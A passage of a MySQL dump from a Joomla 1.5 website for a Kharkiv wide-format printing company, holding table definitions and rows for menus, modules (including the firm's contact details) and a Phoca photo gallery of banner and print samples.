\ndisplay_description_detail=\ndisplay_title_description=\nfont_size_desc=\nfont_color_desc=\ndescription_detail_height=\ndescription_lightbox_font_size=\ndescription_lightbox_font_color=\ndescription_lightbox_bg_color=\nslideshow_delay=\nslideshow_pause=\nslideshow_random=\ndetail_buttons=\nphocagallery_width=\nphocagallery_center=\ncategory_ordering=\nimage_ordering=\ngallery_metadesc=\ngallery_metakey=\nalt_value=\nenable_user_cp=\nenable_upload_avatar=\nenable_avatar_approve=\nenable_usercat_approve=\nenable_usersubcat_approve=\nuser_subcat_count=\nmax_create_cat_char=\nenable_userimage_approve=\nmax_upload_char=\nupload_maxsize=\nupload_maxres_width=\nupload_maxres_height=\nuser_images_max_size=\nenable_java=\nenable_java_admin=\njava_resize_width=\njava_resize_height=\njava_box_width=\njava_box_height=\ndisplay_rating=\ndisplay_rating_img=\ndisplay_comment=\ndisplay_comment_img=\ncomment_width=\nmax_comment_char=\ndisplay_comment_nopup=\nexternal_comment_system=\nfb_comment_app_id=\nfb_comment_width=\nfb_comment_count=\nenable_piclens=\nstart_piclens=\npiclens_image=\nswitch_image=\nswitch_width=\nswitch_height=\nswitch_fixed_size=\nenable_overlib=\nol_bg_color=\nol_fg_color=\nol_tf_color=\nol_cf_color=\noverlib_overlay_opacity=\noverlib_image_rate=\ncreate_watermark=\nwatermark_position_x=\nwatermark_position_y=\ndisplay_icon_vm=\ndisplay_category_statistics=\ndisplay_main_cat_stat=\ndisplay_lastadded_cat_stat=\ncount_lastadded_cat_stat=\ndisplay_mostviewed_cat_stat=\ncount_mostviewed_cat_stat=\ndisplay_camera_info=\nexif_information=\ndisplay_categories_geotagging=\ncategories_lng=\ncategories_lat=\ncategories_zoom=\ncategories_map_width=\ncategories_map_height=\ndisplay_icon_geotagging=\ndisplay_category_geotagging=\ncategory_map_width=\ncategory_map_height=\npagination_thumbnail_creation=\nclean_thumbnails=\nenable_thumb_creation=\ncrop_thumbnail=\njpeg_quality=\nenable_picasa_loading=\npicasa_load_pagination=\nicon_format=\nlarge_image_width=\nlarge_image_height=\nmedium_image_width=\nmedium_image_height=\nsmall_image_width=\nsmall_image_height=\nfront_modal_box_width=\nfront_modal_box_height=\nadmin_modal_box_width=\nadmin_modal_box_height=\nfolder_permissions=\njfile_thumbs=\npage_title=\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(28,'mainmenu','Требования к макету','trebovaniya','index.php?option=com_content&view=article&id=26','component',1,0,20,0,6,62,'2015-10-13 13:24:36',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(29,'mainmenu','Видео','video','index.php?option=com_content&view=article&id=27','component',1,0,20,0,9,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0);
/*!40000 ALTER TABLE `jos_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_menu_types`
--

DROP TABLE IF EXISTS `jos_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `description` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_menu_types`
--

LOCK TABLES `jos_menu_types` WRITE;
/*!40000 ALTER TABLE `jos_menu_types` DISABLE KEYS */;
INSERT INTO `jos_menu_types` VALUES (1,'mainmenu','Главное меню','Главное меню этого сайта'),(2,'dop-menu','Левое меню','Левое меню'),(3,'other-menu','Дополнительное меню','');
/*!40000 ALTER TABLE `jos_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_messages`
--

DROP TABLE IF EXISTS `jos_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` int(10) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` int(11) NOT NULL DEFAULT '0',
  `priority` int(1) unsigned NOT NULL DEFAULT '0',
  `subject` text NOT NULL,
  `message` text NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_messages`
--

LOCK TABLES `jos_messages` WRITE;
/*!40000 ALTER TABLE `jos_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_messages_cfg`
--

DROP TABLE IF EXISTS `jos_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) NOT NULL DEFAULT '',
  `cfg_value` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_messages_cfg`
--

LOCK TABLES `jos_messages_cfg` WRITE;
/*!40000 ALTER TABLE `jos_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_migration_backlinks`
--

DROP TABLE IF EXISTS `jos_migration_backlinks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_migration_backlinks` (
  `itemid` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `url` text NOT NULL,
  `sefurl` text NOT NULL,
  `newurl` text NOT NULL,
  PRIMARY KEY (`itemid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_migration_backlinks`
--

LOCK TABLES `jos_migration_backlinks` WRITE;
/*!40000 ALTER TABLE `jos_migration_backlinks` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_migration_backlinks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_modules`
--

DROP TABLE IF EXISTS `jos_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text NOT NULL,
  `content` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) DEFAULT NULL,
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) DEFAULT NULL,
  `numnews` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `control` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`)
) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_modules`
--

LOCK TABLES `jos_modules` WRITE;
/*!40000 ALTER TABLE `jos_modules` DISABLE KEYS */;
INSERT INTO `jos_modules` VALUES (1,'Главное меню','',1,'menu',0,'0000-00-00 00:00:00',1,'mod_mainmenu',0,0,1,'menutype=mainmenu\nmenu_style=list\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=\nmoduleclass_sfx=_menu\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',1,0,''),(2,'Авторизация','',1,'login',0,'0000-00-00 00:00:00',1,'mod_login',0,0,1,'',1,1,''),(3,'Самое популярное','',3,'cpanel',0,'0000-00-00 00:00:00',1,'mod_popular',0,2,1,'',0,1,''),(4,'Последние Материалы','',4,'cpanel',0,'0000-00-00 00:00:00',1,'mod_latest',0,2,1,'ordering=c_dsc\nuser_id=0\ncache=0\n\n',0,1,''),(5,'Перечень меню','',5,'cpanel',0,'0000-00-00 00:00:00',1,'mod_stats',0,2,1,'',0,1,''),(6,'Непрочитанные сообщения','',1,'header',0,'0000-00-00 00:00:00',1,'mod_unread',0,2,1,'',1,1,''),(7,'Сейчас на сайте','',2,'header',0,'0000-00-00 00:00:00',1,'mod_online',0,2,1,'',1,1,''),(8,'Инструментальная панель','',1,'toolbar',0,'0000-00-00 00:00:00',1,'mod_toolbar',0,2,1,'',1,1,''),(9,'Панель быстрого доступа','',1,'icon',0,'0000-00-00 00:00:00',1,'mod_quickicon',0,2,1,'',1,1,''),(10,'Авторизованные пользователи','',2,'cpanel',0,'0000-00-00 00:00:00',1,'mod_logged',0,2,1,'',0,1,''),(11,'Авторские права Joomla!','',0,'footer',0,'0000-00-00 00:00:00',1,'mod_footer',0,0,1,'',1,1,''),(12,'Меню администратора','',1,'menu',0,'0000-00-00 00:00:00',1,'mod_menu',0,2,1,'',0,1,''),(13,'Подменю администратора','',1,'submenu',0,'0000-00-00 00:00:00',1,'mod_submenu',0,2,1,'',0,1,''),(14,'Статус пользователя','',1,'status',0,'0000-00-00 00:00:00',1,'mod_status',0,2,1,'',0,1,''),(15,'Заголовок','',1,'title',0,'0000-00-00 00:00:00',1,'mod_title',0,2,1,'',0,1,''),(16,'header','<p style=\"text-align: center;\"><img src=\"images/stories/header.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"935\" height=\"300\" style=\"vertical-align: middle; border: 0pt none;\" /></p>',0,'banner',62,'2013-01-10 10:11:29',0,'mod_custom',0,0,0,'moduleclass_sfx=\n\n',0,0,''),(17,'Search','',0,'advert1',0,'0000-00-00 00:00:00',0,'mod_search',0,0,0,'moduleclass_sfx=\nwidth=30\ntext=\nbutton=1\nbutton_pos=right\nimagebutton=\nbutton_text=\nset_itemid=\ncache=1\ncache_time=900\n\n',0,0,''),(18,'logo','<p><img src=\"images/stories/logo.png\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"300\" height=\"100\" style=\"border: 0pt none;\" />vvvvvvvvvvvvvvvvvvvvvvvvvv</p>',0,'logo',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,0,'moduleclass_sfx=\n\n',0,0,''),(19,'Дополнительное меню','',1,'left',0,'0000-00-00 00:00:00',0,'mod_mainmenu',0,0,1,'menutype=dop-menu',0,0,''),(21,'Новое доп. меню','',0,'horiz-dop-menu',62,'2013-12-19 16:00:59',1,'mod_mainmenu',0,0,0,'menutype=dop-menu\nmenu_style=list_flat\nstartLevel=0\nendLevel=0\nshowAllChildren=0\nwindow_open=\nshow_whitespace=0\ncache=1\ntag_id=\nclass_sfx=\nmoduleclass_sfx=\nmaxdepth=10\nmenu_images=0\nmenu_images_align=0\nmenu_images_link=0\nexpand_menu=0\nactivate_parent=0\nfull_active_id=0\nindent_image=0\nindent_image1=\nindent_image2=\nindent_image3=\nindent_image4=\nindent_image5=\nindent_image6=\nspacer=\nend_spacer=\n\n',0,0,''),(20,'Телефоны','<div class=\"tab\">\r\n<p>Моб.: <span>(098)</span> 407-92-92</p>\r\n<p>Моб.: <span>(099)</span> 407-92-92</p>\r\n<p>Моб.: <span>(093)</span> 407-92-92</p>\r\n</div>\r\n<div class=\"tab\">\r\n<p>Тел.: <span>(057)</span> 737-25-33</p>\r\n<p class=\"mail\"><span>E-mail:</span> ekvatorprint@mail.ru</p>\r\n</div>',0,'advert1',0,'0000-00-00 00:00:00',1,'mod_custom',0,0,1,'moduleclass_sfx=\n\n',0,0,'');
/*!40000 ALTER TABLE `jos_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_modules_menu`
--

DROP TABLE IF EXISTS `jos_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_modules_menu`
--

LOCK TABLES `jos_modules_menu` WRITE;
/*!40000 ALTER TABLE `jos_modules_menu` DISABLE KEYS */;
INSERT INTO `jos_modules_menu` VALUES (1,0),(16,1),(17,0),(18,0),(19,0),(20,0),(21,0);
/*!40000 ALTER TABLE `jos_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_newsfeeds`
--

DROP TABLE IF EXISTS `jos_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` text NOT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text NOT NULL,
  `filename` varchar(200) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(11) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(11) unsigned NOT NULL DEFAULT '3600',
  `checked_out` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_newsfeeds`
--

LOCK TABLES `jos_newsfeeds` WRITE;
/*!40000 ALTER TABLE `jos_newsfeeds` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery`
--

DROP TABLE IF EXISTS `jos_phocagallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(250) NOT NULL DEFAULT '',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `userid` int(11) NOT NULL DEFAULT '0',
  `videocode` text,
  `vmproductid` int(11) NOT NULL DEFAULT '0',
  `imgorigsize` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `extlink1` text,
  `extlink2` text,
  `extid` varchar(255) NOT NULL DEFAULT '',
  `extl` varchar(255) NOT NULL DEFAULT '',
  `extm` varchar(255) NOT NULL DEFAULT '',
  `exts` varchar(255) NOT NULL DEFAULT '',
  `exto` varchar(255) NOT NULL DEFAULT '',
  `extw` varchar(255) NOT NULL DEFAULT '',
  `exth` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`)
) ENGINE=MyISAM AUTO_INCREMENT=44 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery`
--

LOCK TABLES `jos_phocagallery` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery` DISABLE KEYS */;
INSERT INTO `jos_phocagallery` VALUES (1,2,0,'Banner-1','banner-1','Bannera/Banner-1.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,427861,1,1,62,'2015-08-18 14:25:15',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(2,2,0,'Banner-2','banner-2','Bannera/Banner-2.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,262116,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(3,2,0,'Banner-3','banner-3','Bannera/Banner-3.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,479012,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(4,2,0,'Banner-4','banner-4','Bannera/Banner-4.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,401695,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(5,2,0,'Banner-5','banner-5','Bannera/Banner-5.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,292280,1,1,0,'0000-00-00 00:00:00',5,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(6,2,0,'Banner-6','banner-6','Bannera/Banner-6.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,277708,1,1,0,'0000-00-00 00:00:00',6,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(7,2,0,'Banner-7','banner-7','Bannera/Banner-7.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,382802,1,1,0,'0000-00-00 00:00:00',7,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(8,2,0,'Banner-8','banner-8','Bannera/Banner-8.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,384546,1,1,0,'0000-00-00 00:00:00',8,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(9,2,0,'Banner-9','banner-9','Bannera/Banner-9.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,424087,1,1,0,'0000-00-00 00:00:00',9,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(10,2,0,'Banner-10','banner-10','Bannera/Banner-10.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,496815,1,1,0,'0000-00-00 00:00:00',10,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(11,2,0,'Banner-11','banner-11','Bannera/Banner-11.jpg',NULL,'2014-04-08 10:34:50',0,'','',0,'',0,NULL,0,356049,1,1,0,'0000-00-00 00:00:00',11,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(17,3,0,'Citylights-1','citylights-1','Citylights/Citylights-1.jpg',NULL,'2014-04-09 15:06:59',0,'','',0,'',0,NULL,0,430935,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(18,3,0,'Citylights-2','citylights-2','Citylights/Citylights-2.jpg',NULL,'2014-04-09 15:06:59',0,'','',0,'',0,NULL,0,381436,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(19,4,0,'Plenka-1','plenka-1','Plenki/Plenka-1.jpg',NULL,'2014-04-09 15:07:17',0,'','',0,'',0,NULL,0,415064,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(20,5,0,'Setka-1','setka-1','Setki/Setka-1.jpg',NULL,'2014-04-09 15:07:32',0,'','',0,'',0,NULL,0,427312,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(21,5,0,'Setka-2','setka-2','Setki/Setka-2.jpg',NULL,'2014-04-09 15:07:32',0,'','',0,'',0,NULL,0,498984,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(22,5,0,'Setka-3','setka-3','Setki/Setka-3.jpg',NULL,'2014-04-09 15:07:32',0,'','',0,'',0,NULL,0,595929,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(23,5,0,'Setka-4','setka-4','Setki/Setka-4.jpg',NULL,'2014-04-09 15:07:32',0,'','',0,'',0,NULL,0,423732,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(24,6,0,'Fotooboi-1','fotooboi-1','Fotooboi/Fotooboi-1.jpg',NULL,'2014-04-18 13:19:51',0,'','',0,'',0,NULL,0,369427,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(25,6,0,'Fotooboi-2','fotooboi-2','Fotooboi/Fotooboi-2.jpg',NULL,'2014-04-18 13:19:51',0,'','',0,'',0,NULL,0,367083,1,1,0,'0000-00-00 00:00:00',2,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(26,6,0,'Fotooboi-3','fotooboi-3','Fotooboi/Fotooboi-3.jpg',NULL,'2014-04-18 13:19:51',0,'','',0,'',0,NULL,0,360441,1,1,0,'0000-00-00 00:00:00',3,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(27,6,0,'Fotooboi-4','fotooboi-4','Fotooboi/Fotooboi-4.jpg',NULL,'2014-04-18 13:19:51',0,'','',0,'',0,NULL,0,402016,1,1,0,'0000-00-00 00:00:00',4,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(28,7,0,'Bumaga-bluback-1','bumaga-bluback-1','Bumaga-bluback/Bumaga-bluback-1.jpg',NULL,'2014-04-18 13:20:40',0,'','',0,'',0,NULL,0,448980,1,1,0,'0000-00-00 00:00:00',1,NULL,NULL,NULL,NULL,NULL,'','','','','','',''),(29,2,0,'Banner-12','banner-12','Bannera/Banner-12.jpg','','2015-01-26 00:00:00',0,'','',0,'',0,'',0,7497443,1,1,0,'0000-00-00 00:00:00',12,NULL,'','','','','','','','','','',''),(30,2,0,'Banner-13','banner-13','Bannera/Banner-13.jpg','','2015-01-26 00:00:00',0,'','',0,'',0,'',0,8089796,1,1,0,'0000-00-00 00:00:00',13,NULL,'','','','','','','','','','',''),(31,2,0,'Banner-14','banner-14','Bannera/Banner-14.jpg','','2015-01-26 00:00:00',0,'','',0,'',0,'',0,7696477,1,1,0,'0000-00-00 00:00:00',14,NULL,'','','','','','','','','','',''),(32,4,0,'Plenka-2','plenka-2','Plenki/Plenka-2.jpg','','2015-01-26 00:00:00',0,'','',0,'',0,'',0,8886782,1,1,0,'0000-00-00 00:00:00',2,NULL,'','','','','','','','','','',''),(33,8,0,'Kartini-1','kartini-1','Kartini/Kartini-1.jpg','','2015-03-19 00:00:00',0,'','',0,'',0,'',0,5812458,1,1,0,'0000-00-00 00:00:00',1,NULL,'','','','','','','','','','',''),(34,8,0,'Kartini-2','kartini-2','Kartini/Kartini-2.jpg','','2015-03-19 00:00:00',0,'','',0,'',0,'',0,7114506,1,1,0,'0000-00-00 00:00:00',2,NULL,'','','','','','','','','','',''),(35,8,0,'Kartini-3','kartini-3','Kartini/Kartini-3.jpg','','2015-03-19 00:00:00',0,'','',0,'',0,'',0,5879901,1,1,0,'0000-00-00 00:00:00',3,NULL,'','','','','','','','','','',''),(36,8,0,'Kartini-4','kartini-4','Kartini/Kartini-4.jpg','','2015-03-19 00:00:00',0,'','',0,'',0,'',0,7848923,1,1,0,'0000-00-00 00:00:00',4,NULL,'','','','','','','','','','',''),(37,2,0,'Banner-15','banner-15','Bannera/banner15.jpg','','2015-07-07 15:04:27',0,'','',0,'',0,'',0,283391,1,1,0,'0000-00-00 00:00:00',15,NULL,'','','','','','','','','','',''),(38,2,0,'Banner-16','banner-16','Bannera/banner16.jpg','','2015-07-07 15:06:10',0,'','',0,'',0,'',0,305909,1,1,0,'0000-00-00 00:00:00',16,NULL,'','','','','','','','','','',''),(39,2,0,'Banner-17','banner-17','Bannera/banner17.jpg','','2015-07-07 15:07:57',0,'','',0,'',0,'',0,282322,1,1,0,'0000-00-00 00:00:00',17,NULL,'','','','','','','','','','',''),(40,5,0,'Setka-5','setka-5','Setki/Setka-5.jpg','','2015-07-13 11:32:24',0,'','',0,'',0,'',0,4241846,1,1,0,'0000-00-00 00:00:00',5,NULL,'','','','','','','','','','',''),(41,5,0,'Setka-6','setka-6','Setki/Setka-6.jpg','','2015-07-13 11:33:08',0,'','',0,'',0,'',0,9740360,1,1,0,'0000-00-00 00:00:00',6,NULL,'','','','','','','','','','',''),(42,2,0,'Banner-18','banner-18','Bannera/20150806183413.jpg','','2015-08-18 14:23:03',0,'','',0,'',0,'',0,3009644,1,1,0,'0000-00-00 00:00:00',18,NULL,'','','','','','','','','','',''),(43,2,0,'Banner-19','banner-19','Bannera/20150806183453.jpg','','2015-08-18 14:23:55',0,'','',0,'',0,'',0,1244900,1,1,0,'0000-00-00 00:00:00',19,NULL,'','','','','','','','','','','');
/*!40000 ALTER TABLE `jos_phocagallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_phocagallery_categories`
--

DROP TABLE IF EXISTS `jos_phocagallery_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_phocagallery_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `owner_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `hits` int(11) NOT NULL DEFAULT '0',
  `accessuserid` text,
  `uploaduserid` text,
  `deleteuserid` text,
  `userfolder` text,
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `extid` varchar(255) NOT NULL DEFAULT '',
  `exta` varchar(255) NOT NULL DEFAULT '',
  `extu` varchar(255) NOT NULL DEFAULT '',
  `extauth` varchar(255) NOT NULL DEFAULT '',
  `params` text,
  `metakey` text,
  `metadesc` text,
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_phocagallery_categories`
--

LOCK TABLES `jos_phocagallery_categories` WRITE;
/*!40000 ALTER TABLE `jos_phocagallery_categories` DISABLE KEYS */;
